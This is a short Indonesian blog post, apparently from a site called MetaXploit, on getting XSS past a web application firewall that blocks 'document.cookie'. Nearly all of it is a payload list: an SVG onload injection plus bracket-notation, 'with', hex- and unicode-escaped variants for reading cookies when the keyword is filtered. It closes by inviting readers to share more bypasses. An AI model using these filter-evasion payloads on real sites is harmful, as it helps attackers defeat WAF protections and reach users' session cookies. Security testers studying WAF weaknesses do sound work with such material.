MetaXploit

XSS: Bypass Blocked document.cookie

Kadangkala saat kita mengeksploitasi web yang memiliki kerentanan XSS kita mendapati bahwa web tersebut menerapkan web aplication firewal atau yang sering kita sebut sebagai waf.

Bypass Blocked document.cookie
Bypass Blocked document.cookie

Dalam menerapkan waf ini ada bermacam-macam cara yaitu: dengan memfilter suatu kata atau karakter dan mereplace dengan karakter lain, ataupun jika terdeteksi ada malicious code maka sistem akan menampilkan pesan 403 forbidden dan semacamnya.

Pada kasus yang pernah saya temukan ketika saya ingin menampilkan cookie dengan payload "><svg/onload=alert(document.cookie)> otomatis akan direplace menjadi "><svg/onload=alert([removed])> dengan kata lain document.cookie telah di blacklist oleh sistem.

Lalu bagaimana bypass blocked document.cookie?
Berikut adalah kumpulan code javascript yang dapat digunakan untuk menampilkan cookie sebagai alternatif dari document.cookie
alert(cookie)
self['\x61\x6c\x65\x72\x74'](cookie)
document['cookie']
with(document)alert(cookie)
Atau jika website memblock kata cookie maka gunakan code yang telah diencode dibawah ini
document['\x63\x6f\x6f\x6b\x69\x65']
document['\u0063\u006f\u006f\u006b\u0069\u0065']
Itulah yang bisa saya bagikan pada artikel ini, jika kalian punya payload untuk bypass document.cookie yang tidak ada pada artikel diatas, bisa kalian bagikan di kolom komentar. Terimaksih
Share This :
MetaXploit

Adalah seorang web designer yang suka mempelajari hal-hal yang baru seputar blog, template, coding dan Bisnis Online. Untuk mempelajari hal baru, membutuhkan kesabaran dan ketelitian dalam mempelajarinya.